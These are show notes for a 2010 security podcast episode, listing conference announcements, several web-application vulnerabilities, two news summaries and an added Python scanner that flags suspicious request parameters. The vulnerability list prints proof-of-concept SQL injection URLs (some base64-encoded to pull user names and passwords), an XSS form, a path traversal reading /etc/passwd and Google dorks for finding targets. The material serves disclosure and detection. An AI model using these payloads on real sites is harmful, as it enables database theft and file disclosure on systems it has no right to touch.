Episode 99 – Episode of “Do”

ISD Podcast Episode 99 for March 31, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • Washington DC – April 12th-16th
    • San Diego – May 10th-14th
    • San Francisco – June 14th-18th
    • Atlanta – July 12th-16th
    • Chicago – September 13th-17th
    • Dallas, TX – October 11th-15th
    • Washington DC – December 6th-10th
    • Cost is $3500 for all classes. To reserve and register, email smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

  • April 15th – 18th, 2010 Cleveland, Ohio
  • http://notacon.org/
  • Adrian will be there presenting on Anti-Forensics

Atlanta ISSA:

  • http://www.secureworldexpo.com/events/index.php?id=281

Friends of the Podcast:

  • Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. WordPress My Category Order Plugin (mycategoryorder.php) is subject to a SQL Injection vulnerability because it fails to properly sanitize user-supplied input before using it in a SQL query.  Versions less than 2.8 are affected.  Exploit URL is available: http://www.sample.com/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1
    2. AfterLogic WebMail Pro is subject to a Cross-Site Scripting vulnerability, allowing injection of malicious code in the context of the application.  Versions less than 4.7.10 are affected.  The targeted user must be logged in to the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8.
      <html>
      <head>
      </head>
      <body>
      <form method="post"
      action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574"
      onSubmit="return false;">
      <input value="value"/>
      <input name="HistoryStorageObjectName" value="location;
      alert('xss'); //"/>
      </form>
      </body>
      </html>
      The vendor has made available a patched version. Update to AfterLogic WebMail Pro 4.7.11.
    3. DreamPoll is subject to Cross-Site Scripting and SQL Injection vulnerabilities. These could be exploited to make unauthorized changes to a web site or to compromise a client accessing a site that uses the application.  Versions less than 4.7.10 are affected.  Example URLs are available: http://www.sample.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

      http://www.sample.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

    4. Docebo is subject to multiple SQL Injection vulnerabilities. Version 3.6.0.3 is affected. Google Dorks: Powered by PHP Live! v3.2.1, Powered by PHP Live! v3.2.2 and allinurl:"request.php" "deptid".  Example URLs are available: http://www.sample.com/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

      http://www.sample.com/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

      http://www.sample.com/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2

    5. Pepsi CMS (Irmin cms) is subject to multiple Local File Inclusion (LFI) vulnerabilities. Version pepsi-0.6-BETA2 is affected. Example URLs are available: http://www.sample.com/PATH/index.php?w=[LFI%]

      http://www.sample.com/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00

    6. Joomla Component com_guide is subject to a SQL Injection vulnerability. Example URLs are available: http://www.sample.com/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
    7. PeaZip is subject to a division-by-zero bug resulting in a denial of service.  Version 3.0 is affected, though others may be as well.  To trigger the vulnerability, open the application, click Tools, then Enter password / keyfile.
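
The request shapes in the list above (the quote-terminated parameter in item 1, the arithmetic tautology and sleep() probe in item 3, the base64-wrapped UNION SELECT in item 4, the ../ and %00 traversal in item 5, and the UNION SELECT in item 6) are exactly what a log-review script or a WAF rule should be catching. The Python below is an added example, not code from the podcast or from any of the affected projects: it parses request paths of those shapes, URL-decodes the parameters, additionally base64-decodes values that look like base64 (which is how the item 4 payloads hide the injection), and reports which indicator fired on which parameter. Every sample request is constructed for this example, and the heuristics themselves (the regexes, the 16-character base64 threshold) are assumptions that will need tuning on real traffic.

```python
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request paths (not from the podcast or from any vendor advisory).
# Their shapes follow the request patterns in the list above; the last one is benign.
SAMPLE_REQUESTS = [
    "/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0'&idString=3,5,4,1",
    "/index.php?action=login&sortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20",
    "/index.php?action=login&sortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20",
    "/docebo/doceboLms/index.php?modname=faq&op=play&mode=help"
    "&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g",
    "/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00",
    "/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--",
    "/index.php?option=com_content&view=article&id=42",
]

# Indicator regexes (assumed heuristics, applied to decoded parameter values).
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I),
    "arith_tautology": re.compile(r"\b\d+\s*-\s*\d+\s*=\s*0\b"),
    "quote_breakout": re.compile(r"'\s*(?:$|--|#|\)|and\b|or\b|union\b)", re.I),
    "path_traversal": re.compile(r"(?:\.\./|\.\.\\){2,}"),
    "null_byte": re.compile(r"\x00"),
    "sensitive_file": re.compile(r"/etc/(?:passwd|shadow)\b", re.I),
}

# Values that look like base64 are decoded as well (assumed 16-char minimum to limit noise).
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_candidates(value: str) -> list[str]:
    """Forms of one parameter value worth matching: the value as parse_qsl already
    URL-decoded it, plus its base64 decoding when that yields printable ASCII."""
    candidates = [value]
    if BASE64_RE.fullmatch(value):
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            return candidates
        if raw and all(32 <= b < 127 for b in raw):
            candidates.append(raw.decode("ascii"))
    return candidates


def scan_request(request_path: str) -> dict[str, list[str]]:
    """Return {indicator: [parameter names that triggered it]} for one request path."""
    query = urlsplit(request_path).query
    hits: dict[str, list[str]] = {}
    # parse_qsl turns '+' into spaces and percent-decodes, so %23 -> '#' and %00 -> NUL here.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for candidate in decode_candidates(value):
            for label, pattern in INDICATORS.items():
                if pattern.search(candidate) and name not in hits.setdefault(label, []):
                    hits[label].append(name)
    return hits


def flagged_requests(requests: list[str]) -> list[tuple[str, dict[str, list[str]]]]:
    """Keep only the requests that fired at least one indicator."""
    return [(req, hits) for req in requests if (hits := scan_request(req))]


if __name__ == "__main__":
    for req, hits in flagged_requests(SAMPLE_REQUESTS):
        print(req)
        for label, params in hits.items():
            print(f"    {label}: {', '.join(params)}")
```

Run against the constructed list, six of the seven requests are flagged and the Joomla article request is not. The base64 step matters: the item 4 `word=` value contains nothing suspicious until it is decoded, at which point both the UNION SELECT and the leading quote breakout appear. Expect the quote_breakout rule to misfire on legitimate values such as surnames with apostrophes; that is the trade-off of a stateless heuristic, and the proper fix on the application side remains parameterized queries and path validation rather than request filtering.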

Stories of Interest:
News item 1: http://fcw.com/articles/2010/03/24/fose-cloud-computing-not-always-helpful-in-data-recovery.aspx
Newer technologies such as cloud computing can be a boon for post-disaster recovery of data, but they don’t always help much, Dennis Heretick, former chief information security officer for the Justice Department, said at a FOSE trade show session today.

“Cloud computing can provide more reliability, but that should not be assumed,” Heretick said. How a specific cloud application fits within an agency’s or company’s disaster recovery strategy should be assessed by each organization individually, he added.

Overall, in the last five years, disaster recovery and business continuity planning have become easier and less costly because of the availability of automated electronic storage processes for critical data, Heretick said.

Even so, there are hurdles to overcome in developing and implementing a disaster recovery plan and process. Some of the main obstacles include the difficulty of obtaining management support for disaster recovery goals and identifying and obtaining support for roles for individuals to perform in executing the plan, Heretick said.

News item 2: http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=224200279
Seventy-seven percent of C-level executives in a 115-person survey conducted in the U.K. say their organization has experienced a data breach at some point and all of them report attacks targeting corporate data in the past 12 months.

These findings come from a study released on Wednesday by IBM, a company that sells data protection services, and The Ponemon Institute, a privacy and information management research organization.

Larry Ponemon, founder of the group that bears his name, said that survey shows a shift in the way C-level executives think about security software. Investing in data protection, he said, is now seen as less expensive than recovering from a data breach.

Data protection initiatives on average, according to the survey, result in a cost savings or revenue improvement of 11 million ($16 million) for organizations.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.